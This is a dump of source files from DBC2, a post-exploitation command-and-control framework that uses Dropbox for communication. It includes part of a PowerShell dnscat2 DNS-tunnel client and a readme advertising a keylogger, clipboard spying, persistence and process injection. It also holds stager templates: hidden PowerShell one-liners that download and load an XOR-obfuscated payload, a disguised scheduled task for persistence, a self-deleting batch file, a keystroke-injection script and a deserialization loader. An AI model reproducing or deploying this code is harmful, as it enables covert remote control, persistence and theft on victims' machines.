$Reason) $Session["DriverDataQueue"] += $DriverData } } "0006" # COMMAND_DELAY { try { $Session["Delay"] = [Convert]::ToUInt32($Session.CommandFields, 16) Write-Verbose ('New Delay: ' + $Session["Delay"].ToString()) } catch {} } "1000" # TUNNEL_CONNECT { try { $Tunnel = New-Object System.Collections.Hashtable $Tunnel.Add("Host", (Convert-HexToString $Session["CommandFields"].Substring(0, $Session["CommandFields"].Length - 4)).Trim(0)) $Tunnel.Add("Port", [Convert]::ToUInt16($Session["CommandFields"].Substring($Session["CommandFields"].Length - 4), 16)) $Tunnel.Add("TunnelId", (New-RandomDNSField 8)) $Session["Tunnels"].Add($Tunnel.TunnelId, $Tunnel) ## START UP TUNNEL $Session = New-Dnscat2Tunnel $Session $Tunnel.TunnelId if ($Session["Tunnels"][$Tunnel.TunnelId].Dead) { $ErrorCode = $CommandId $Reason = (Convert-StringToHex "Failed to start tunnel") + "00" $PacketLengthField = ([Convert]::ToString((4 + 2 + $Reason.Length/2),16)).PadLeft(8, '0') $DriverData = ($PacketLengthField + $Session.PacketIdBF + "1000" + $ErrorCode + $Reason) $Session["DriverDataQueue"] += $DriverData } $DriverData = ("00000008" + $Session.PacketIdBF + "1000" + $Tunnel.TunnelId) $Session["DriverDataQueue"] += $DriverData } catch { $ErrorCode = $CommandId $Reason = (Convert-StringToHex "Failed to start tunnel") + "00" $PacketLengthField = ([Convert]::ToString((4 + 2 + $Reason.Length/2),16)).PadLeft(8, '0') $DriverData = ($PacketLengthField + $Session.PacketIdBF + "1000" + $ErrorCode + $Reason) $Session["DriverDataQueue"] += $DriverData } } "1001" # TUNNEL_DATA { try { $TunnelId = $Session["CommandFields"].Substring(0, 8) $Data = $Session["CommandFields"].Substring(8) $Session = Send-ToDnscat2Tunnel $Session $TunnelId $Data } catch { } } "1002" # TUNNEL_CLOSE { try { $TunnelId = $Session["CommandFields"] $Session = Close-Dnscat2Tunnel $Session $TunnelId } catch { } } } } return $Session } function Read-DataFromDriver ($Session) { if ($Session["Driver"] -eq "console") { $Data = "" if($Host.UI.RawUI.KeyAvailable) { $Data = ((Read-Host) + "`n") } $Session["DriverDataQueue"] += (Convert-StringToHex $Data) return $Session } elseif ($Session["Driver"] -eq "command") { # Tunnels are the only time a command session sends data without a prior request if ($Session["Tunnels"].Count -gt 0) { # Update Tunnels $TunnelIds = @() $TunnelIds += $Session["Tunnels"].Keys foreach ($TunnelId in $TunnelIds) { $Session = Read-FromDnscat2Tunnel $Session $TunnelId if ($Session[$TunnelId].Dead) { $Session["DeadTunnels"] += $TunnelId } } # Remove Dead Tunnels foreach ($TunnelId in $Session["DeadTunnels"]) { $Session["Tunnels"].Remove($TunnelId) } $Session["DeadTunnels"] = @() } } elseif ($Session["Driver"] -eq "exec") { if($Host.UI.RawUI.KeyAvailable) { $Host.UI.RawUI.ReadKey("NoEcho,IncludeKeyUp") | Out-Null } if($Session["StdOutReadOperation"].IsCompleted) { $StdOutBytesRead = ($Session["Process"]).StandardOutput.BaseStream.EndRead($Session["StdOutReadOperation"]) if($StdOutBytesRead -eq 0){ $Session.Dead = $True; return $Session } $Session["DriverDataQueue"] += Convert-BytesToHex ($Session["StdOutDestinationBuffer"][0..([int]$StdOutBytesRead-1)]) $Session["StdOutReadOperation"] = ($Session["Process"]).StandardOutput.BaseStream.BeginRead($Session["StdOutDestinationBuffer"], 0, 65536, $null, $null) } if($Session["StdErrReadOperation"].IsCompleted) { $StdErrBytesRead = ($Session["Process"]).StandardError.BaseStream.EndRead($Session["StdErrReadOperation"]) if($StdErrBytesRead -eq 0){ $Session.Dead = $True; return $Session } $Session["DriverDataQueue"] += Convert-BytesToHex ($Session["StdErrDestinationBuffer"][0..([int]$StdErrBytesRead-1)]) $Session["StdErrReadOperation"] = ($Session["Process"]).StandardError.BaseStream.BeginRead($Session["StdErrDestinationBuffer"], 0, 65536, $null, $null) } } return $Session } function Send-DataToDriver ($Data, $Session) { if ($Session["Driver"] -eq "console") { $StringData = Convert-HexToString $Data Write-Host -n $StringData } elseif ($Session["Driver"] -eq "command") { $Session["CommandPacketBuffer"] += $Data } elseif ($Session["Driver"] -eq "exec") { $StringData = Convert-HexToString $Data ($Session["Process"]).StandardInput.WriteLine($StringData.TrimEnd("`r").TrimEnd("`n")) } elseif ($Session["Driver"] -eq "PS") { # Only execute when a newline is sent $Session["PSCommand"] += $Data if (($Session["PSCommand"][-1..-2] -join '') -eq 'A0') { $Session["PSCommandReady"] = $True } } return $Session } function Stop-Dnscat2Session ($Session) { Send-Dnscat2Packet (New-Dnscat2FIN $Session["Domain"] $Session["SessionId"] $Session["Domain"]) $Session["Domain"] $Session["DNSServer"] $Session["DNSPort"] $Session["LookupTypes"] $Session["Encryption"] $Session["EncryptionKeys"]| Out-Null if ($Session["Driver"] -eq "exec") { taskkill /T /F /PID $Session["ProcessId"] 2>&1 | Out-Null } $Session["Dead"] = $True return $Session } function Update-Dnscat2Session ($Session) { try { # Retrive Driver Data $Session = Read-DataFromDriver $Session if ($Session["Encryption"]) { $Session["EncryptionKeys"]["nonce"] += 1 if ($Session["EncryptionKeys"]["nonce"] -gt 65500) { # DO ENCRYPTION RENOGOTIATION $Session = Start-Dnscat2EncInit $Session $True } } if ($Session.Dead) { $Session = Stop-Dnscat2Session $Session return $Session } # Grab next data in the queue $PacketData = (Get-NextDnscat2Data $Session["DriverDataQueue"] $Session["MaxMSGDataSize"]) # Delay $RandomDelay = $Session['MaxRandomDelay'] if ($Session['MaxRandomDelay'] -le 0) { $RandomDelay = 0 } Sleep -Milliseconds ($Session['Delay'] + $RandomDelay) try { $MSGPACKET = (New-Dnscat2MSG $Session["Domain"] $Session["SessionId"] $Session["SequenceNumber"] $Session["AcknowledgementNumber"] $PacketData) $Packet = (Send-Dnscat2Packet $MSGPACKET $Session["Domain"] $Session["DNSServer"] $Session["DNSPort"] $Session["LookupTypes"] $Session["Encryption"] $Session["EncryptionKeys"]) } catch { Write-Error "Dnscat2: Failed to send packet! " $Session.Dead = $True return $Session } try { $Packet = (ConvertTo-Dnscat2Packet $Packet) if($Packet -eq 1){ Write-Error "Dnscat2: Failed to ConvertTo-Dnscat2Packet..."; $Session.Dead = $True } if ($Packet["MessageType"] -eq "01") { # Check if server ACKed sent data $BytesACKed = (Compare-SequenceNumber $Session["SequenceNumber"] $Packet["AcknowledgementNumber"]) if ($BytesACKed -ne 0) { # If data was ACKed, remove it from Queue $Session["DriverDataQueue"] = ($Session["DriverDataQueue"]).Substring($BytesACKed*2) } $Session["SequenceNumber"] = $Packet["AcknowledgementNumber"] # ACK the server data if ($Packet["Data"] -ne "") { $Session["AcknowledgementNumber"] = Update-Dnscat2ACK $Packet["Data"] $Packet["SequenceNumber"] $Session = Send-DataToDriver $Packet["Data"] $Session } } elseif ($Packet["MessageType"] -eq "02") { $Session.Dead = $True return $Session } } catch { Write-Error "Dnscat2: Caught error while processing packet, dropping..." $Session.Dead = $True $Session = Stop-Dnscat2Session $Session } if ($Session.Driver -eq "command") { $Session = Update-Dnscat2CommandSession $Session } } catch { $Session.Dead = $True $Session = Stop-Dnscat2Session $Session } return $Session } function Start-Dnscat2 { <# .SYNOPSIS Start a Dnscat2 session. .DESCRIPTION This powershell script is an unofficial client for the dnscat2 DNS tunnel. .PARAMETER Domain The Domain being used by the dnscat2 server. .PARAMETER DNSServer The hostname or IP Address to send DNS queries to. .PARAMETER DNSPort The port to send DNS queries to. .PARAMETER Command Start a command session. (Default) .PARAMETER Exec Link the I/O of a process with the Dnscat2 session. .PARAMETER Console Link the I/O of the console with the Dnscat2 session. .PARAMETER ExecPS Simulate a Powershell session and link the IO with the Dnscat2 session. WARNING: Exiting will kill the entire dnscat2 client, not just the session. .PARAMETER PreSharedSecret Set the shared secret. Set the same one on the server and the client to prevent man-in-the-middle attacks! .PARAMETER NoEncryption Do not enable encryption. .PARAMETER LookupTypes Set an array of lookup types. Each packet has its lookup type randomly selected from the array. Only TXT, MX, CNAME, A, and AAAA records are supported. Default: @(TXT, MX, CNAME) .PARAMETER Delay Set a delay between each request, in milliseconds. (Default: 0) .PARAMETER MaxRandomDelay Set the max value of a random delay added to the normal delay, in milliseconds. (Default: 0) .PARAMETER MaxPacketSize Maximum length of a dnscat2 packet. .PARAMETER Name The name of your dnscat2 session. (Default: hostname) #> [CmdletBinding()] param( [Parameter(Mandatory=$True)][Alias("d")][string]$Domain, [Alias("s")][string]$DNSServer="", [Alias("p")][ValidateRange(1,65535)][int32]$DNSPort=53, [switch]$Command=$True, [Alias("e")][string]$Exec="", [switch]$Console=$False, [Alias("psh")][switch]$ExecPS=$False, [Alias("sec")][string]$PreSharedSecret="", [Alias("ne")][switch]$NoEncryption=$false, [string[]]$LookupTypes=@("TXT","MX","CNAME"), [Alias("t")][int32]$Delay=0, [Alias("r")][int32]$MaxRandomDelay=0, [ValidateRange(1,240)][int32]$MaxPacketSize=240, [Alias("n")][string]$Name="" ) foreach ($LookupType in $LookupTypes) { if (!(@("TXT","MX","CNAME","A","AAAA") -contains $LookupType)) { Write-Error ($LookupType + " is not a valid Lookup Type!") Write-Error ("Only TXT, MX, CNAME, A, and AAAA lookups are allowed!") return } } $SYNOptions = 1 # Enable OPT_NAME to name the session if ($Exec -ne '') { $Driver = 'exec' $DriverOptions = $Exec } elseif ($Console) { $Driver = 'console' $DriverOptions = '' } elseif ($ExecPS) { $Driver = 'PS' $DriverOptions = '' } else { $Driver = 'command' $DriverOptions = '' $SYNOptions += 0x20 } if (!$NoEncryption) { #$SYNOptions += 0x40 } $SYNOptions = [Convert]::ToString($SYNOptions, 16).PadLeft(4, '0') if ($Name -eq '') { $Name = $Driver + ' (' + (hostname) + ')' } $SYNOptions += (Convert-StringToHex $Name) + '00' $Sessions = New-Object System.Collections.Hashtable $DeadSessions = @() $InitialSession = Start-Dnscat2Session (New-RandomDNSField 4) $SYNOptions $Domain $DNSServer $DNSPort $MaxPacketSize (-not $NoEncryption) $PreSharedSecret $LookupTypes $Delay $MaxRandomDelay $Driver $DriverOptions if ($InitialSession -eq 1) { return } $Sessions.Add($InitialSession["SessionId"], $InitialSession) try { while ($Sessions.Count -gt 0) { # Remove Dead Sessions foreach ($SessionId in $DeadSessions) { $Sessions.Remove($SessionId) } $DeadSessions = @() # Update Sessions $SessionIds = @() $SessionIds += $Sessions.Keys foreach ($SessionId in $SessionIds) { $Sessions[$SessionId] = Update-Dnscat2Session $Sessions[$SessionId] # Execute PS commands here for access to full scope if ($Sessions[$SessionId]["PSCommandReady"]) { try { $Sessions[$SessionId]["DriverDataQueue"] += (Convert-StringToHex (Invoke-Expression (Convert-HexToString $Sessions[$SessionId]["PSCommand"]) | Out-String)) } catch { } $Sessions[$SessionId]["PSCommand"] = "" $Sessions[$SessionId]["PSCommandReady"] = $False } # Execute PS uploads here for access to full scope if ($Sessions[$SessionId]["PSUploadReady"]) { try { Set-Variable -Name $Sessions[$SessionId]["PSUploadName"] -Value $Sessions[$SessionId]["PSUploadValue"] } catch { } $Sessions[$SessionId]["PSUploadReady"] = $False $Sessions[$SessionId]["PSUploadName"] = "" $Sessions[$SessionId]["PSUploadValue"] = "" } # Execute PS downloads here for access to full scope if ($Sessions[$SessionId]["PSDownloadReady"]) { try { $VarValue = (Get-Variable -Name $Sessions[$SessionId]["PSDownloadName"] -ValueOnly) if ($VarValue.GetType().fullname -eq "System.Byte[]") { $VarValue = Convert-BytesToHex $VarValue $PacketLengthField = ([Convert]::ToString((4 + ($VarValue.Length/2)),16)).PadLeft(8, '0') $Sessions[$SessionId]["DriverDataQueue"] += ($PacketLengthField + $Sessions[$SessionId]["PSDownloadPacketIdBF"] + "0003" + $VarValue) } } catch { } $Sessions[$SessionId]["PSDownloadReady"] = $False $Sessions[$SessionId]["PSDownloadPacketIdBF"] = "" $Sessions[$SessionId]["PSDownloadName"] = "" } if ($Sessions[$SessionId].Dead) { $DeadSessions += $SessionId } if (($Sessions[$SessionId])["NewSessions"].Count -gt 0) { foreach ($NewSessionId in $Sessions[$SessionId].NewSessions.Keys) { $Sessions.Add($NewSessionId, $Sessions[$SessionId]["NewSessions"][$NewSessionId]) } $Sessions[$SessionId].NewSessions = New-Object System.Collections.Hashtable } } } } finally { $SessionIds = @() $SessionIds += $Sessions.Keys foreach ($SessionId in $SessionIds) { Stop-Dnscat2Session $Sessions[$SessionId] } } } ================================================ FILE: readme.md ================================================ DBC2 ============ LAST/CURRENT VERSION: 0.2.6 Author: Arno0x0x - [@Arno0x0x](http://twitter.com/Arno0x0x) DBC2 (DropboxC2) is a modular post-exploitation tool, composed of an agent running on the victim's machine, a controler, running on any machine, powershell modules, and Dropbox servers as a means of communication. This project was initially inspired by the fantastic Empire framework, but also as an objective to learn Python. Check out this introduction and demo of basic functionnalities (v0.0.1) : [![Demo](https://dl.dropboxusercontent.com/s/uj7joge12iu6dn6/dbc2_demo.jpg?dl=0)](https://vimeo.com/195596062) New features in version 0.2.x : [![Demo](https://dl.dropboxusercontent.com/s/flldt93uprg33cp/dbc2_v0.2.jpg?dl=0)](https://vimeo.com/197902404) The app is distributed under the terms of the [GPLv3 licence](http://www.gnu.org/copyleft/gpl.html). Architecture ---------------- ![DBC2 Architecture](https://dl.dropboxusercontent.com/s/bwgtzt1x5e3zpxe/dbc2_architecture.jpg?dl=0 "DBC2 Architecture") Features ---------------- DBC2 main features: - Various stager (Powershell one liner, batch file, MS-Office macro, javascript, DotNetToJScript, msbuild file, SCT file, ducky, more to come...) - Single CLI commands (*one at a time, no environment persistency*) - Pseudo-interactive shell (*environment persistency*) - based on an idea from *0xDEADBEEF00 [at] gmail.com* - Send file to the agent - Retrieve file from the agent - Launch processes on the agent - Keylogger - Clipboard logger (*clipboard recording/spying*) - Screenshot capture - Run and interact with PowerShell modules (*Endless capabilities: PowerSploit, Inveigh, Nishang, Empire modules, Powercat, etc.*) - Send key strokes to any process - Set persistency through scheduled task and single instance through Mutex - Can run within `(w|c)script.exe` thanks to the DotNetToJScript stager (*javascript2*) - Can be **injected into any process** thanks to the nativeWrapper and its corresponding position independant shellcode ! Dependencies & requirements ---------------- DBC2 requires a Dropbox application (*"App folder" only is sufficient*) to be created within your Dropbox account and an access token generated for this application, in order to be able to perform API calls. Look at the intoduction video on how to do this if you're unsure. On the controller side, DBC2 requires: * Python 2.7 (not tested with Python 3) * The following libraries, that can be installed using `pip install -r requirements.txt`: - requests>=2.11 - tabulate - pyscrypt - pycrypto DBC2 controller has been successfully tested and used on Linux Kali and Mac OSX. On the agent side, DBC2 requires: * .Net framework >= 4.5 (tested sucessfully on Windows 7 and Windows 10) Security Aspects ----------- DBC2 controller asks for a master password when it starts. This password is then derived into a 128 bits master key by the use of the PBKDF function from the pyscrypt library. The master key is then base64 encoded and can (*optionnally*) be saved in the config file. DBC2 performs end-to-end encryption of data using the master key with AES-128/CBC mode. Data exchanged between the agent and the controller flows through the Dropbox servers so while the transfer itself is encrypted, thanks to HTTPS, data has to be end-to-end encrypted to protect the data while at rest on the Dropbox servers. DBC2 also performs obfuscation of the stages and the modules by the use of XOR encryption, which is dumb encryption but is enough to simply obfuscate some well known and publically available piece of codes. The key used to perform XOR encryption is a SHA256 hash of the master key. Installation & Configuration ------------ Installation is pretty straight forward: * Git clone this repository: `git clone https://github.com/Arno0x/DBC2 dbc2` * cd into the DBC2 folder: `cd dbc2` * Install requirements using `pip install -r requirements.txt` * Give the execution rights to the main script: `chmod +x dropboxC2.py` To start the controller, simply type `./dropboxC2.py`. Configuration is done through the `config.py` file: * You can optionnally specify your Dropbox API access token and base64 encoded master key. If you do so, the controller won't ask you for these when it starts. DBC2 is also available as a Docker container so it's: Check [DBC2 on Docker hub](https://hub.docker.com/r/arno0x0x/dbc2/). Or simply do: `docker pull arno0x0x/dbc2` Compiling your own agent stage ------------ You can very easily compile your own executables of the agent stage, from the source code provided. You don't need Visual Studio installed. * Copy the agent/source folder on a Windows machine with the .Net framework installed * CD into the source directory * Use the .Net command line C# compiler: - To get the standard agent executable: `C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe /out:dbc2_agent.exe *.cs` - To get the debug version: `C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe /define:DEBUG /out:dbc2_agent_debug.exe *.cs` DISCLAIMER ---------------- This tool is intended to be used in a legal and legitimate way only: - either on your own systems as a means of learning, of demonstrating what can be done and how, or testing your defense and detection mechanisms - on systems you've been officially and legitimately entitled to perform some security assessments (pentest, security audits) Quoting Empire's authors: *There is no way to build offensive tools useful to the legitimate infosec industry while simultaneously preventing malicious actors from abusing them.* Author ---------------- Arno0x0x - You can contact me on my twitter page (@Arno0x0x). TODO ------------ This is still version beta of this tool, and my first project developped with Python and C#. So it is probably full of bugs, not written in the most *Pythonic* of CSharp'ish way. Bugs fixes and improvements will come over time as I'll be getting feedback on this tool. To be added in the next releases: - Gather basic system information for each agent at startup - Create some basic event at the agent side and event subscription and automatic action on controller side (*ex: "machine locked or screensaver started" would allow for some activity that is visible like sending keystrokes to some processes, or "a given process or connection has been established") - Add option for the stage to auto persist at first startup - Possibility to task an agent with more than one task at a time To be fixed: - Fix missing encryption on the "sendFile" function (*due to me being lazy: on the agent side I wanted to leverage the WebClient->DownloadFile function and I'm not sure how to put my decryption routine in the middle of the flow without having to rewrite this function by hand*). This is the only data that is not encrypted. Anything flowing from the agent back to the controller through the Dropbox servers is properly encrypted. ================================================ FILE: requirements.txt ================================================ requests>=2.11 tabulate pycrypto pyscrypt ================================================ FILE: templates/batch.tpl ================================================ @echo off start /b ${oneliner} (goto) 2>nul & del "%~f0" ================================================ FILE: templates/dbc2Loader.tpl ================================================ function setversion() { var shell = new ActiveXObject('WScript.Shell'); ver = 'v4.0.30319'; try { shell.RegRead('HKLM\\SOFTWARE\\Microsoft\\.NETFramework\\v4.0.30319\\'); } catch(e) { ver = 'v2.0.50727'; } shell.Environment('Process')('COMPLUS_Version') = ver; } function debug(s) {} function base64ToStream(b) { var enc = new ActiveXObject("System.Text.ASCIIEncoding"); var length = enc.GetByteCount_2(b); var ba = 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"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+ "AAAAAAAAAAAAAAAAAAAAAAAAACAAAAwAAAAwOAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+ "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+ "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+ "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+ "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+ "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+ "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+ "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+ "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+ "AAAAAAAAAAAAAAAAAAAAAAABDQAAAAQAAAAJFwAAAAkGAAAACRYAAAAGGgAAACdTeXN0ZW0uUmVm"+ "bGVjdGlvbi5Bc3NlbWJseSBMb2FkKEJ5dGVbXSkIAAAACgsA"; var entry_class = 'dbc2Loader'; try { setversion(); var stm = base64ToStream(serialized_obj); var fmt = new ActiveXObject('System.Runtime.Serialization.Formatters.Binary.BinaryFormatter'); var al = new ActiveXObject('System.Collections.ArrayList'); var n = fmt.SurrogateSelector; var d = fmt.Deserialize_2(stm); al.Add(n); var o = d.DynamicInvoke(al.ToArray()).CreateInstance(entry_class); o.loadDBC2("${stagePublicURL}","${xorKey}","${accessToken}","${masterKey}"); } catch (e) { debug(e.message); } ================================================ FILE: templates/ducky.tpl ================================================ DELAY 3000 GUI r DELAY 1000 STRING cmd ENTER DELAY 2000 STRING $oneliner ENTER ================================================ FILE: templates/javascript.tpl ================================================ oneliner = '${oneliner}'; r = new ActiveXObject("WScript.Shell").Run(oneliner,0,true); ================================================ FILE: templates/msbuild.tpl ================================================ ================================================ FILE: templates/oneliner.tpl ================================================ powershell.exe -NoP -sta -NonI -W Hidden -Enc ${payload} ================================================ FILE: templates/oneliner2.tpl ================================================ powershell.exe -NoP -sta -NonI -W Hidden -Command "& {$$wc=New-Object Net.WebClient;$$wc.Headers.Add('User-Agent','Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:49.0);Gecko/20100101 Firefox/49.0');$$wc.Proxy=[Net.WebRequest]::DefaultWebProxy;$$wc.Proxy.Credentials=[Net.CredentialCache]::DefaultNetworkCredentials;$$k='${xorKey}';$$i=0;[byte[]]$$b=([byte[]]($$wc.'DownloadData'('${stagePublicURL}')))|%%{$$_-bxor$$k[$$i++%%$$k.length]};[System.Reflection.Assembly]::Load($$b) | Out-Null;$$p=@('${accessToken}', '${masterKey}');[dropboxc2.C2_Agent]::Main($$p)}" ================================================ FILE: templates/persist.tpl ================================================ powershell.exe -NoP -sta -NonI -W Hidden -Command "$$Action = New-ScheduledTaskAction -Execute '${oneliner}'; $$Trigger = New-ScheduledTaskTrigger -AtLogon; $$Task = New-ScheduledTask -Action $$Action -Trigger $$Trigger -Settings (New-ScheduledTaskSettingsSet); $$Task | Register-ScheduledTask -TaskName 'WindowsUserLogRotate'" ================================================ FILE: templates/posh.tpl ================================================ $$wc=New-Object System.Net.WebClient;$$wc.Headers.Add("User-Agent","Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:49.0) Gecko/20100101 Firefox/49.0");$$wc.Proxy=[System.Net.WebRequest]::DefaultWebProxy;$$wc.Proxy.Credentials=[System.Net.CredentialCache]::DefaultNetworkCredentials $$k="${xorKey}";$$i=0;[byte[]]$$b=([byte[]]($$wc.DownloadData("${stagePublicURL}")))|%{$$_-bxor$$k[$$i++%$$k.length]} [System.Reflection.Assembly]::Load($$b) | Out-Null $$p=@("${accessToken}", "${masterKey}") [dropboxc2.C2_Agent]::Main($$p) ================================================ FILE: templates/posh.tpl.old ================================================ $$S = @" using System; using System.Net; using System.Reflection; namespace n { public static class c { public static void l() { WebClient wc = new WebClient(); IWebProxy dp = WebRequest.DefaultWebProxy; if (dp != null) { dp.Credentials = CredentialCache.DefaultCredentials; wc.Proxy = dp; } wc.Headers.Add("User-Agent","Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:49.0) Gecko/20100101 Firefox/49.0"); byte[] b = wc.DownloadData("${stagePublicURL}"); string k = "${xorKey}"; for(int i = 0; i < b.Length; i++) { b[i] = (byte) (b[i] ^ k[i % k.Length]); } string[] parameters = new string[] {"${accessToken}", "${masterKey}"}; object[] args = new object[] {parameters}; Assembly a = Assembly.Load(b); MethodInfo method = a.EntryPoint; object o = a.CreateInstance(method.Name); method.Invoke(o, args); }}} "@ Add-Type -TypeDefinition $$S -Language CSharp [n.c]::l() ================================================ FILE: templates/runPSModule.tpl ================================================ $$wc=New-Object System.Net.WebClient;$$wc.Proxy=[System.Net.WebRequest]::DefaultWebProxy;$$wc.Proxy.Credentials=[System.Net.CredentialCache]::DefaultNetworkCredentials;$$k='${xorKey}';$$i=0;[char[]]$$b=([char[]]($$wc.DownloadString('${moduleURL}')))|%{$$_-bxor$$k[$$i++%$$k.length]};IEX($$b-Join'');Write-Host "-> Module successfully loaded" ================================================ FILE: templates/sct.tpl ================================================